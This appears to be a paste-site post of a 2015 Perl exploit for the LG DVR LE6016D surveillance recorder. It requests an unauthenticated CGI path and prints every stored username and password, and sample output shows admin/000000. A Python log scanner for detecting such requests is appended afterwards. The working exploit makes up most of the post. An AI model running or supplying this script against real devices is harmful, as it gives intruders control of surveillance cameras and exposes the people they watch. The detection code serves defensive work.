hackerscommunity

LG DVR LE6016D unauthenticated remote u:p disclosure exploit

Jul 11th, 2015
#!/usr/bin/perl
#
#              LG DVR LE6016D unauthenticated remote
#               users/passwords disclosure exploit
#
#
#                Copyright 2015 (c) Todor Donev
#                  <todor.donev at gmail.com>
#                http://www.ethical-hacker.org/
####
#
#  Digital video recorder (DVR) surveillance is the use of cameras,
#  often hidden or concealed, that use DVR technology to record
#  video for playback or immediate viewing. As technological
#  innovations have made improvements in the security and
#  surveillance industry, DVR surveillance has become more
#  prominent and allows for easier and more versatile security
#  systems in homes and businesses. A DVR surveillance security
#  system can be designed for indoor use or outdoor use and can
#  often involve hidden security cameras, concealed “nanny cams”
#  for home security, and even personal recording devices hidden
#  on a person.
#
####
#
#  Description:
#  No authentication (login) is required to exploit this vulnerability.
#  This program demonstrates how an unpatched security bug would enable
#  hackers to gain control of a vulnerable device while sitting
#  behind their keyboard, potentially thousands of miles away.
#  An unauthenticated attacker that is connected to the DVR may be
#  able to retrieve the device's administrator password, allowing them
#  to directly access the device's configuration control panel.
#
####
#
#  Disclaimer:
#  This and previous programs are for educational purposes ONLY. Do not
#  use it without permission. The usual disclaimer applies, especially
#  the fact that Todor Donev is not liable for any damages caused by
#  direct or indirect use of the information or functionality provided
#  by these programs. The author or any Internet provider bears NO
#  responsibility for content or misuse of these programs or any
#  derivatives thereof. By using these programs you accept the fact
#  that any damage (dataloss, system crash, system compromise, etc.)
#  caused by the use of these programs is not Todor Donev's
#  responsibility.
#
####
#                Use them at your own risk!
####
#
#         $ perl lg.pl 133.7.133.7:80
#            LG DVR LE6016D unauthenticated remote
#              users/passwords disclosure exploit
#                    u/p: admin/000000
#                    u/p: user1/000000
#                    u/p: user2/000000
#                    u/p: user3/000000
#                    u/p: LOGOUT/000000
#               Copyright 2015 (c) Todor Donev
#                 <todor.donev at gmail.com>
#               http://www.ethical-hacker.org/
#
####

use LWP::Simple;
print "   LG DVR LE6016D unauthenticated remote\n     users/passwords disclosure exploit\n";
# No argument given: print usage and exit.
if (@ARGV == 0) {&usg; &foot;}
# The last command-line argument is used as the target (host:port).
while (@ARGV > 0) {
    $t = shift(@ARGV);
}
# user.cgi is served without any login and returns the account list.
my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!");
# Walk the <name>/<pw> pairs in the response (five accounts).
for (my $i=0; $i <= 4; $i++){
    if  ($r =~ m/<name>(.*)<\/name>/g){
        print "           u\/p: $1\/";
    }
    if  ($r =~ m/<pw>(.*)<\/pw>/g){
        print "$1\n";
    }
}
&foot;
sub usg(){
    print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n";
}
sub foot(){
    print "      Copyright 2015 (c) Todor Donev\n        <todor.donev at gmail.com>\n";
    print "      http://www.ethical-hacker.org/\n";
    exit;
}
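
A defensive counterpart to the script above, as an added example that is not part of the original paste: it scans access logs for requests to the `/dvr/wwwroot/user.cgi` path the script fetches and lists clients that received a 200 without authenticating. The combined log format (for instance from a reverse proxy in front of the DVR), the function names and the sample lines are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Path fetched by the script above (taken from the paste).
SENSITIVE_PATH = "/dvr/wwwroot/user.cgi"

# Combined log format, e.g. from a reverse proxy in front of the DVR (assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def normalise(target):
    """Reduce a request target to a bare path: drop scheme/host and query, decode, squeeze slashes."""
    path = re.sub(r"^[a-z][a-z0-9+.-]*://[^/]*", "", target, flags=re.I)
    path = unquote(path.split("?", 1)[0].split("#", 1)[0])
    return re.sub(r"/{2,}", "/", path)

def find_credential_fetches(lines):
    """Return {client_ip: [(timestamp, status, authenticated)]} for requests to SENSITIVE_PATH."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or normalise(m["target"]) != SENSITIVE_PATH:
            continue
        hits[m["ip"]].append((m["ts"], int(m["status"]), m["user"] != "-"))
    return dict(hits)

def exposed_clients(hits):
    """Clients that were served the account list (HTTP 200) with no authenticated user."""
    return sorted(ip for ip, rows in hits.items()
                  if any(status == 200 and not authed for _, status, authed in rows))

# Constructed sample lines using documentation address ranges, not real traffic.
SAMPLE_LOG = [
    '198.51.100.23 - - [11/Jul/2015:10:02:11 +0000] "GET /dvr/wwwroot/user.cgi HTTP/1.1" 200 612',
    '192.0.2.10 - admin [11/Jul/2015:10:05:40 +0000] "GET /dvr/wwwroot/user.cgi HTTP/1.1" 200 612',
    '203.0.113.7 - - [11/Jul/2015:10:07:02 +0000] "GET /dvr//wwwroot/%75ser.cgi?x=1 HTTP/1.1" 200 612',
    '203.0.113.9 - - [11/Jul/2015:10:09:15 +0000] "GET /index.html HTTP/1.1" 200 1043',
    '198.51.100.77 - - [11/Jul/2015:10:11:30 +0000] "GET /dvr/wwwroot/user.cgi HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    hits = find_credential_fetches(SAMPLE_LOG)
    for ip in exposed_clients(hits):
        print(f"{ip}: unauthenticated 200 on {SENSITIVE_PATH} -> {hits[ip]}")
```

Every account password on the device should be treated as disclosed to any client this reports, so rotate them once access to the DVR's web interface has been restricted.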